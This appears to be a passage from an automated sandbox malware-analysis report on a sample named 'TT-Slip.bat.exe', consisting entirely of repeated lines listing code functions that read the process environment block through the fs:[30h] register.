Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A1070 mov eax, dword ptr fs:[00000030h]	9_2_016A1070
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A1070 mov eax, dword ptr fs:[00000030h]	9_2_016A1070
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A1070 mov eax, dword ptr fs:[00000030h]	9_2_016A1070
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A1070 mov eax, dword ptr fs:[00000030h]	9_2_016A1070
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A1070 mov eax, dword ptr fs:[00000030h]	9_2_016A1070
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A1070 mov eax, dword ptr fs:[00000030h]	9_2_016A1070
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A1070 mov eax, dword ptr fs:[00000030h]	9_2_016A1070
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A1070 mov eax, dword ptr fs:[00000030h]	9_2_016A1070
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A1070 mov eax, dword ptr fs:[00000030h]	9_2_016A1070
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A1070 mov eax, dword ptr fs:[00000030h]	9_2_016A1070
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171106E mov eax, dword ptr fs:[00000030h]	9_2_0171106E
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01716050 mov eax, dword ptr fs:[00000030h]	9_2_01716050
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0173705E mov ebx, dword ptr fs:[00000030h]	9_2_0173705E
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0173705E mov eax, dword ptr fs:[00000030h]	9_2_0173705E
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01692050 mov eax, dword ptr fs:[00000030h]	9_2_01692050
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BB052 mov eax, dword ptr fs:[00000030h]	9_2_016BB052
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168A020 mov eax, dword ptr fs:[00000030h]	9_2_0168A020
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168C020 mov eax, dword ptr fs:[00000030h]	9_2_0168C020
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175903E mov eax, dword ptr fs:[00000030h]	9_2_0175903E
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175903E mov eax, dword ptr fs:[00000030h]	9_2_0175903E
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175903E mov eax, dword ptr fs:[00000030h]	9_2_0175903E
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175903E mov eax, dword ptr fs:[00000030h]	9_2_0175903E
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01714000 mov ecx, dword ptr fs:[00000030h]	9_2_01714000
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016AE016 mov eax, dword ptr fs:[00000030h]	9_2_016AE016
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016AE016 mov eax, dword ptr fs:[00000030h]	9_2_016AE016
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016AE016 mov eax, dword ptr fs:[00000030h]	9_2_016AE016
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016AE016 mov eax, dword ptr fs:[00000030h]	9_2_016AE016
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016980E9 mov eax, dword ptr fs:[00000030h]	9_2_016980E9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168A0E3 mov ecx, dword ptr fs:[00000030h]	9_2_0168A0E3
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B50E4 mov eax, dword ptr fs:[00000030h]	9_2_016B50E4
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B50E4 mov ecx, dword ptr fs:[00000030h]	9_2_016B50E4
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017160E0 mov eax, dword ptr fs:[00000030h]	9_2_017160E0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168C0F0 mov eax, dword ptr fs:[00000030h]	9_2_0168C0F0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D20F0 mov ecx, dword ptr fs:[00000030h]	9_2_016D20F0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A70C0 mov eax, dword ptr fs:[00000030h]	9_2_016A70C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A70C0 mov ecx, dword ptr fs:[00000030h]	9_2_016A70C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A70C0 mov ecx, dword ptr fs:[00000030h]	9_2_016A70C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A70C0 mov eax, dword ptr fs:[00000030h]	9_2_016A70C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A70C0 mov ecx, dword ptr fs:[00000030h]	9_2_016A70C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A70C0 mov ecx, dword ptr fs:[00000030h]	9_2_016A70C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A70C0 mov eax, dword ptr fs:[00000030h]	9_2_016A70C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A70C0 mov eax, dword ptr fs:[00000030h]	9_2_016A70C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A70C0 mov eax, dword ptr fs:[00000030h]	9_2_016A70C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A70C0 mov eax, dword ptr fs:[00000030h]	9_2_016A70C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A70C0 mov eax, dword ptr fs:[00000030h]	9_2_016A70C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A70C0 mov eax, dword ptr fs:[00000030h]	9_2_016A70C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A70C0 mov eax, dword ptr fs:[00000030h]	9_2_016A70C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A70C0 mov eax, dword ptr fs:[00000030h]	9_2_016A70C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A70C0 mov eax, dword ptr fs:[00000030h]	9_2_016A70C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A70C0 mov eax, dword ptr fs:[00000030h]	9_2_016A70C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A70C0 mov eax, dword ptr fs:[00000030h]	9_2_016A70C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A70C0 mov eax, dword ptr fs:[00000030h]	9_2_016A70C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017120DE mov eax, dword ptr fs:[00000030h]	9_2_017120DE
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017650D9 mov eax, dword ptr fs:[00000030h]	9_2_017650D9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B90DB mov eax, dword ptr fs:[00000030h]	9_2_016B90DB
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0170D0C0 mov eax, dword ptr fs:[00000030h]	9_2_0170D0C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0170D0C0 mov eax, dword ptr fs:[00000030h]	9_2_0170D0C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017560B8 mov eax, dword ptr fs:[00000030h]	9_2_017560B8
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017560B8 mov ecx, dword ptr fs:[00000030h]	9_2_017560B8
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017280A8 mov eax, dword ptr fs:[00000030h]	9_2_017280A8
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169208A mov eax, dword ptr fs:[00000030h]	9_2_0169208A
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168D08D mov eax, dword ptr fs:[00000030h]	9_2_0168D08D
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C909C mov eax, dword ptr fs:[00000030h]	9_2_016C909C
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171D080 mov eax, dword ptr fs:[00000030h]	9_2_0171D080
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171D080 mov eax, dword ptr fs:[00000030h]	9_2_0171D080
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BD090 mov eax, dword ptr fs:[00000030h]	9_2_016BD090
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BD090 mov eax, dword ptr fs:[00000030h]	9_2_016BD090
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01695096 mov eax, dword ptr fs:[00000030h]	9_2_01695096
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0173437C mov eax, dword ptr fs:[00000030h]	9_2_0173437C
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0174F367 mov eax, dword ptr fs:[00000030h]	9_2_0174F367
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01697370 mov eax, dword ptr fs:[00000030h]	9_2_01697370
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01697370 mov eax, dword ptr fs:[00000030h]	9_2_01697370
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01697370 mov eax, dword ptr fs:[00000030h]	9_2_01697370
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168D34C mov eax, dword ptr fs:[00000030h]	9_2_0168D34C
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168D34C mov eax, dword ptr fs:[00000030h]	9_2_0168D34C
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175A352 mov eax, dword ptr fs:[00000030h]	9_2_0175A352
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171035C mov eax, dword ptr fs:[00000030h]	9_2_0171035C
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171035C mov eax, dword ptr fs:[00000030h]	9_2_0171035C
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171035C mov eax, dword ptr fs:[00000030h]	9_2_0171035C
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171035C mov ecx, dword ptr fs:[00000030h]	9_2_0171035C
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171035C mov eax, dword ptr fs:[00000030h]	9_2_0171035C
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171035C mov eax, dword ptr fs:[00000030h]	9_2_0171035C
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01765341 mov eax, dword ptr fs:[00000030h]	9_2_01765341
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01712349 mov eax, dword ptr fs:[00000030h]	9_2_01712349
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01712349 mov eax, dword ptr fs:[00000030h]	9_2_01712349
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01712349 mov eax, dword ptr fs:[00000030h]	9_2_01712349
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01712349 mov eax, dword ptr fs:[00000030h]	9_2_01712349
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01712349 mov eax, dword ptr fs:[00000030h]	9_2_01712349
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01712349 mov eax, dword ptr fs:[00000030h]	9_2_01712349
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01712349 mov eax, dword ptr fs:[00000030h]	9_2_01712349
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01712349 mov eax, dword ptr fs:[00000030h]	9_2_01712349
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01712349 mov eax, dword ptr fs:[00000030h]	9_2_01712349
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01712349 mov eax, dword ptr fs:[00000030h]	9_2_01712349
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01712349 mov eax, dword ptr fs:[00000030h]	9_2_01712349
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01712349 mov eax, dword ptr fs:[00000030h]	9_2_01712349
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01712349 mov eax, dword ptr fs:[00000030h]	9_2_01712349
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01712349 mov eax, dword ptr fs:[00000030h]	9_2_01712349
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01712349 mov eax, dword ptr fs:[00000030h]	9_2_01712349
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01689353 mov eax, dword ptr fs:[00000030h]	9_2_01689353
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01689353 mov eax, dword ptr fs:[00000030h]	9_2_01689353
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BF32A mov eax, dword ptr fs:[00000030h]	9_2_016BF32A
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01687330 mov eax, dword ptr fs:[00000030h]	9_2_01687330
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175132D mov eax, dword ptr fs:[00000030h]	9_2_0175132D
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175132D mov eax, dword ptr fs:[00000030h]	9_2_0175132D
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CA30B mov eax, dword ptr fs:[00000030h]	9_2_016CA30B
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CA30B mov eax, dword ptr fs:[00000030h]	9_2_016CA30B
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CA30B mov eax, dword ptr fs:[00000030h]	9_2_016CA30B
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168C310 mov ecx, dword ptr fs:[00000030h]	9_2_0168C310
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171930B mov eax, dword ptr fs:[00000030h]	9_2_0171930B
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171930B mov eax, dword ptr fs:[00000030h]	9_2_0171930B
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171930B mov eax, dword ptr fs:[00000030h]	9_2_0171930B
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B0310 mov ecx, dword ptr fs:[00000030h]	9_2_016B0310
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A03E9 mov eax, dword ptr fs:[00000030h]	9_2_016A03E9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A03E9 mov eax, dword ptr fs:[00000030h]	9_2_016A03E9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A03E9 mov eax, dword ptr fs:[00000030h]	9_2_016A03E9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A03E9 mov eax, dword ptr fs:[00000030h]	9_2_016A03E9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A03E9 mov eax, dword ptr fs:[00000030h]	9_2_016A03E9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A03E9 mov eax, dword ptr fs:[00000030h]	9_2_016A03E9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A03E9 mov eax, dword ptr fs:[00000030h]	9_2_016A03E9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A03E9 mov eax, dword ptr fs:[00000030h]	9_2_016A03E9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017653FC mov eax, dword ptr fs:[00000030h]	9_2_017653FC
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0174F3E6 mov eax, dword ptr fs:[00000030h]	9_2_0174F3E6
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C63FF mov eax, dword ptr fs:[00000030h]	9_2_016C63FF
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016AE3F0 mov eax, dword ptr fs:[00000030h]	9_2_016AE3F0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016AE3F0 mov eax, dword ptr fs:[00000030h]	9_2_016AE3F0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016AE3F0 mov eax, dword ptr fs:[00000030h]	9_2_016AE3F0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0174B3D0 mov ecx, dword ptr fs:[00000030h]	9_2_0174B3D0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0169A3C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0169A3C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0169A3C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0169A3C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0169A3C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0169A3C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016983C0 mov eax, dword ptr fs:[00000030h]	9_2_016983C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016983C0 mov eax, dword ptr fs:[00000030h]	9_2_016983C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016983C0 mov eax, dword ptr fs:[00000030h]	9_2_016983C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016983C0 mov eax, dword ptr fs:[00000030h]	9_2_016983C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017163C0 mov eax, dword ptr fs:[00000030h]	9_2_017163C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0174C3CD mov eax, dword ptr fs:[00000030h]	9_2_0174C3CD
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C33A0 mov eax, dword ptr fs:[00000030h]	9_2_016C33A0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C33A0 mov eax, dword ptr fs:[00000030h]	9_2_016C33A0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B33A5 mov eax, dword ptr fs:[00000030h]	9_2_016B33A5
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168E388 mov eax, dword ptr fs:[00000030h]	9_2_0168E388
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168E388 mov eax, dword ptr fs:[00000030h]	9_2_0168E388
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168E388 mov eax, dword ptr fs:[00000030h]	9_2_0168E388
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B438F mov eax, dword ptr fs:[00000030h]	9_2_016B438F
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B438F mov eax, dword ptr fs:[00000030h]	9_2_016B438F
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0176539D mov eax, dword ptr fs:[00000030h]	9_2_0176539D
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016E739A mov eax, dword ptr fs:[00000030h]	9_2_016E739A
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016E739A mov eax, dword ptr fs:[00000030h]	9_2_016E739A
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01688397 mov eax, dword ptr fs:[00000030h]	9_2_01688397
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01688397 mov eax, dword ptr fs:[00000030h]	9_2_01688397
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01688397 mov eax, dword ptr fs:[00000030h]	9_2_01688397
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01740274 mov eax, dword ptr fs:[00000030h]	9_2_01740274
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01740274 mov eax, dword ptr fs:[00000030h]	9_2_01740274
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01740274 mov eax, dword ptr fs:[00000030h]	9_2_01740274
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01740274 mov eax, dword ptr fs:[00000030h]	9_2_01740274
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01740274 mov eax, dword ptr fs:[00000030h]	9_2_01740274
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01740274 mov eax, dword ptr fs:[00000030h]	9_2_01740274
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01740274 mov eax, dword ptr fs:[00000030h]	9_2_01740274
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01740274 mov eax, dword ptr fs:[00000030h]	9_2_01740274
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01740274 mov eax, dword ptr fs:[00000030h]	9_2_01740274
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01740274 mov eax, dword ptr fs:[00000030h]	9_2_01740274
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01740274 mov eax, dword ptr fs:[00000030h]	9_2_01740274
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01740274 mov eax, dword ptr fs:[00000030h]	9_2_01740274
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168826B mov eax, dword ptr fs:[00000030h]	9_2_0168826B
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01694260 mov eax, dword ptr fs:[00000030h]	9_2_01694260
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01694260 mov eax, dword ptr fs:[00000030h]	9_2_01694260
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01694260 mov eax, dword ptr fs:[00000030h]	9_2_01694260
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D1270 mov eax, dword ptr fs:[00000030h]	9_2_016D1270
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D1270 mov eax, dword ptr fs:[00000030h]	9_2_016D1270
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175D26B mov eax, dword ptr fs:[00000030h]	9_2_0175D26B
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175D26B mov eax, dword ptr fs:[00000030h]	9_2_0175D26B
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B9274 mov eax, dword ptr fs:[00000030h]	9_2_016B9274
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C724D mov eax, dword ptr fs:[00000030h]	9_2_016C724D
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171D250 mov ecx, dword ptr fs:[00000030h]	9_2_0171D250
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0174B256 mov eax, dword ptr fs:[00000030h]	9_2_0174B256
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0174B256 mov eax, dword ptr fs:[00000030h]	9_2_0174B256
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01689240 mov eax, dword ptr fs:[00000030h]	9_2_01689240
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01689240 mov eax, dword ptr fs:[00000030h]	9_2_01689240
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01696259 mov eax, dword ptr fs:[00000030h]	9_2_01696259
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01718243 mov eax, dword ptr fs:[00000030h]	9_2_01718243
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01718243 mov ecx, dword ptr fs:[00000030h]	9_2_01718243
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168A250 mov eax, dword ptr fs:[00000030h]	9_2_0168A250
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01765227 mov eax, dword ptr fs:[00000030h]	9_2_01765227
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168823B mov eax, dword ptr fs:[00000030h]	9_2_0168823B
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C7208 mov eax, dword ptr fs:[00000030h]	9_2_016C7208
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C7208 mov eax, dword ptr fs:[00000030h]	9_2_016C7208
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A02E1 mov eax, dword ptr fs:[00000030h]	9_2_016A02E1
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A02E1 mov eax, dword ptr fs:[00000030h]	9_2_016A02E1
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A02E1 mov eax, dword ptr fs:[00000030h]	9_2_016A02E1
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0174F2F8 mov eax, dword ptr fs:[00000030h]	9_2_0174F2F8
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017652E2 mov eax, dword ptr fs:[00000030h]	9_2_017652E2
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016892FF mov eax, dword ptr fs:[00000030h]	9_2_016892FF
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017412ED mov eax, dword ptr fs:[00000030h]	9_2_017412ED
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017412ED mov eax, dword ptr fs:[00000030h]	9_2_017412ED
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017412ED mov eax, dword ptr fs:[00000030h]	9_2_017412ED
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017412ED mov eax, dword ptr fs:[00000030h]	9_2_017412ED
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017412ED mov eax, dword ptr fs:[00000030h]	9_2_017412ED
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017412ED mov eax, dword ptr fs:[00000030h]	9_2_017412ED
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017412ED mov eax, dword ptr fs:[00000030h]	9_2_017412ED
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017412ED mov eax, dword ptr fs:[00000030h]	9_2_017412ED
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017412ED mov eax, dword ptr fs:[00000030h]	9_2_017412ED
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017412ED mov eax, dword ptr fs:[00000030h]	9_2_017412ED
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017412ED mov eax, dword ptr fs:[00000030h]	9_2_017412ED
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017412ED mov eax, dword ptr fs:[00000030h]	9_2_017412ED
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017412ED mov eax, dword ptr fs:[00000030h]	9_2_017412ED
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017412ED mov eax, dword ptr fs:[00000030h]	9_2_017412ED
